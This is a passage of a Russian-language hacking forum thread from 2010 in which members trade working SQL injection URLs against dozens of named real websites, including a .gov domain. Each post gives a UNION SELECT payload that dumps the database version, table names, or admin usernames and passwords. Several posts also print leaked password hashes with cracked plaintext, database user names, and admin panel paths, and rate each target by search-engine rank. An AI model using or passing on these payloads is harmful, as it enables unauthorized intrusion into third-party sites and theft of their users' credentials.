SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.simport.ru/?page=3&id=2+and+1=0+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=0x74616967616b685f736f62696e6573746174--+
    ТИЦ : 10 PR: 1

    http://www.bankrabot.ru/index.php?a=razd2&content=1+group+by+7+--+
    ТИЦ : 20 PR: 2

    http://www.super-yo.com/resultados.php?id=2+union+select+1,2,3,4+--+

    http://thesydneytimes.com.au/?sid=17+and+1=0+union+Select+1,version()+--+
    ТИЦ : 40 PR: 2
    Есть доступ к mysql.user ,но нет прав на запись

    http://nice.in.ua/item.php?id=379+and+1=0+union+Select+1,2,3,4,5,6,7,8,9+--+
    ТИЦ : 20
     
    #12921 tracy, 6 Sep 2010
    Last edited: 6 Sep 2010
  2. MolotSNK

    MolotSNK New Member

    Joined:
    13 Nov 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    2
    *ttp://www.sinodipc.ru/index.php?id=40+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())+LIMIT+1,1

    Database Version: 4.1.25-log
    Database name: wwwsinodipcru
    User name: sinodipc@localhost

    ТИЦ 170
    PR 2
     
  3. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.nkadry.ru/?fv&id_v=4763+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,10,11,12+--+
    ТИЦ : 30 PR: 3


    http://www.tires4you.ru/index1.php?id=760&model=2759+and+1=0+union+select+1,2,3,4,version(),6,7,8,9,10+--+
    ТИЦ : 30

    http://www.mussaloon.ru/?DIR=katalog&id=221+and+1=0+union+select+1,2,3,4,5,version(),7,8+--+
    ТИЦ : 30

    http://www.usa.kirov.ru/index.php?id=31+and+1=0+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x555341--+
    ТИЦ : 20 PR: 2

    http://www.expo.chita.ru/expo/?id=38+and+1=0+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=0x6d246578706f--+
    ТИЦ : 60
    Один из поддоменов крупного сайта chita.ru 15к траффа
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://anysetiers-fondues-chocolat.com/EN/all-products.php?Category=-4+union+select+1,2,3,4,5,6,version()--
    http://www.aureus-pharma.com/Pages/Seminars/seminar_abstracts.php?id_event=56+union+select+version()
     
    _________________________
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://www.nlchp.org/news.cfm?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,[I]16+from+msysaccessobjects
    pr-6[/I]
    Code:
    http://www.bloodaxebooks.com/articles.asp?id=1+union+select+1,2,3+from+msysaccessobjects
    PR 6
    Code:
    http://www.lescompagnonsdelafuste.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10+from+information_schema.tables--
     
    #12925 Дирижабль, 7 Sep 2010
    Last edited: 7 Sep 2010
    3 people like this.
  6. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    тИЦ — 10
    PR — 2

    Code:
    http://www.pays-salers.fr/pages/clubs.php?id=-28+UnIon+selECt+1,user(),3,4,5,6,7,8+--+
    тИЦ — 10
    PR — 3
     
    1 person likes this.
  7. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Code:
    http://www.hoceanshipbuilding.com/ser.php?id=-29+union+select+1,2,3,4,concat(username,char(58),password),6,7+from+admin+--+
    и админка http://www.hoceanshipbuilding.com/admin/login.php
    Code:
    http://www.dl-jiayuan.com/ser.php?id=-9+union+select+1,2,3,concat(username,char(58),password),5,6+from+admin+--+
     
    #12927 Kusto, 8 Sep 2010
    Last edited: 8 Sep 2010
    2 people like this.
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://artia.ru/info.html?id=-1015+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--&cat=14&subcat=55
     
    1 person likes this.
  9. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://www.torgnik.ru/ind.php?pn=1&id_typ=-136+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+[/COLOR]
    4.0.26:torgni:[email protected]
    тиц 10
    PageRank 2
     
    1 person likes this.
  10. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.magniflex.ru/catalog/?id=17&producer=-46+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema=0x6d61676e69666c65785f7275--
    ТИЦ : 70 PR: 3

    http://www.shina-mashina.ru/index.php?cat=news&act=viewdetail&id=27+and+1=0+union+Select+1,version(),3,4,5--


    http://www.ic-sfera.ru/?action=view&id=263128+and+1=0+union+select+version(),2,3,4,5,6,7,8,9,10--
    ТИЦ : 10


    http://www.gmedia.kz/news1.php?uid=33+and+1=0+union+select+1,2,3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x2e69632d73666572612e7275--&pUid=
    ТИЦ : 80 PR: 3

    http://www.buketta.ru/buy.php?id=77+and+1=0+UnIon+selECt+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x4236373930395f753335323330--+--

    http://www.tmsat.ru/telephon/item.php?num=3979+and+1=0+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=0x6d6f62696c655f6461746162617365--
    ТИЦ : 550

    http://www.apex-it.ru/index.php?id_title=topic&view=topic_item&id=12+and+1=0+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=0x7675333030325f617065786974--
    ТИЦ : 10

    http://www.vegabryansk.ru/model/index.php?id_catalog=1&id_categor=0&id_proiz=5+and+1=0+union+select+1,version(),3,4--
    ТИЦ : 20 PR: 3

    http://www.wcra.ru/?val=news&im=27+and+1=0+union+select+1,version()--
     
    #12930 tracy, 8 Sep 2010
    Last edited: 8 Sep 2010
    1 person likes this.
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    ЧУКОТКА

    http://www.visitchukotka.com/tours.php?view=tour&tid=-2+union+select+1,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),3+--


    version : 5.0.51a-24+lenny3-log
    user : [email protected]
    database : z135648_visc
    os : debian-linux-gnu
     
    1 person likes this.
  12. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.ilovecz.ru/index.php?idoflevel=7&idofpage=158+and+1=0+union+select+1,2,3,4,version(),6--
    тИЦ: 1500
    MYSQL 5
     
  13. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.aquaticaonline.net/fish.php?pageid=10250&type=category&id=-575+union+select+1,concat(user_login,char(58),user_pass)+from+wordpress.wp_users+--+


    http://www.killarney.ie/fish.php?id=-4+union+select+1,concat(usr,char(58),pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+ssp_usrs+--+

    http://www.kutkin.ru/fish.php?id=-11+union+select+1,concat(username,char(58),password)+from+ipdenis_adamascar.cute_users+--+

    md5 админский расшифрованный нашол- 1t2sT4 админку ищите сами...
     
    #12933 Kusto, 9 Sep 2010
    Last edited: 9 Sep 2010
    1 person likes this.
  14. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.niasadventure.com/index.php?page=content&cid=83&action=viewgaleri&id=1+and+1=0+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x636d735f70617373776f7264--
    /admin

    c7bb3e8b9166c4894d213ce7589d1025:ciko
    0192023a7bbd73250516f069df18b500:admin123

    http://www.hjauto.ru/carview.php?id=806+and+1=0+UnIon+selECt+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x6175746f5f686a6175746f+--+

    http://mobishop.az/search.php?action=search&catid=2+and+1=0+UnIon+selECt+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+--+
    PR: 3
     
    1 person likes this.
  15. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://arenda5.ru/dosk/ind.php?pn=16&id_typ=-6+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]
    5.0.67-community:sdelka5_arenda5:sdelka5_sdelka5@localhost
    тиц 70
    PageRank 3
     
    1 person likes this.
  16. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    [​IMG]

    [​IMG]

    [​IMG]
     
    #12936 -PRIVAT-, 9 Sep 2010
    Last edited: 9 Sep 2010
  17. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.tuk-tuk.com/member/my.php?id=-384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(tuktuk_system_user_email,char(58),tuktuk_system_user_password),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76+from+tuktuk_web.tuktuk_system_user+--+


    пароли в открытом виде
     
    2 people like this.
  18. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.vires-superum.com/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
     
    1 person likes this.
  19. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.dtms.ru/index.php?ParentID=661+and+1=0+union+select+version()--
    ТИЦ : 10


    http://www.mak.biz.ua/st.php?id=4+and+1=0+union+Select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=0x6d616b62697a39325f636f6e74656e74--
    PR: 2

    http://www.kamins.ru/index.php?all2+&id_sec=3144+and+1=0+union+select+1,version(),3--
    ТИЦ : 10


    http://www.wasmer.ru/?Orima_78&id=169+and+1=0+union+select+1,2,group_concat(schema_name),4,5,6,7+from+information_schema.schemata--
    ТИЦ : 30 PR: 1

    http://www.rukodelielux.ru/catalog.php?m_id=6+and+1=0+union+select+1,2,version()--
    ТИЦ : 10

    /admin - без пароля

    http://www.darshana.ru/tests.php?num=2+and+1=0+union+select+1,2,version(),4,5--
    ТИЦ : 10

    http://www.rozheniza.ru/showinfo.php?id=1'
    ТИЦ : 30

    http://lawine.ru/inner.php?target=forum&tree=11&chid=-3+union+select+1,2,concat_ws(0x3a,aname,apass,aemail),4+from+tadmin--

    /admin

    ТИЦ : 90 PR: 4
    Трафф :
    Торговое представительство компании Lawine.
     
    #12939 tracy, 9 Sep 2010
    Last edited: 9 Sep 2010
    2 people like this.
  20. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.openworld.gov
    за один запрос выводится 3615 логинов с пассами в md5

    Code:
    http://www.openworld.gov/hosts/city.php?id=257&lang=2+and+1=0+union+select+1,concat(username,char(58),user_password)+from+phpbb_users+--+

    этот просто- до кучи
    Code:
    http://www.labusinessconnect.com/city.php?id=42&cid=-42+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+eb_admins+--+
    и еще один
    Code:
    http://www.ilfaroonline.it/city.php?city=ostia&id=-10359+union+select+1,2,3,pass,5,6,7,8,9,10+from+Sql222170_1.admin+--+
     
    #12940 Kusto, 9 Sep 2010
    Last edited: 10 Sep 2010
    3 people like this.
Thread Status:
Not open for further replies.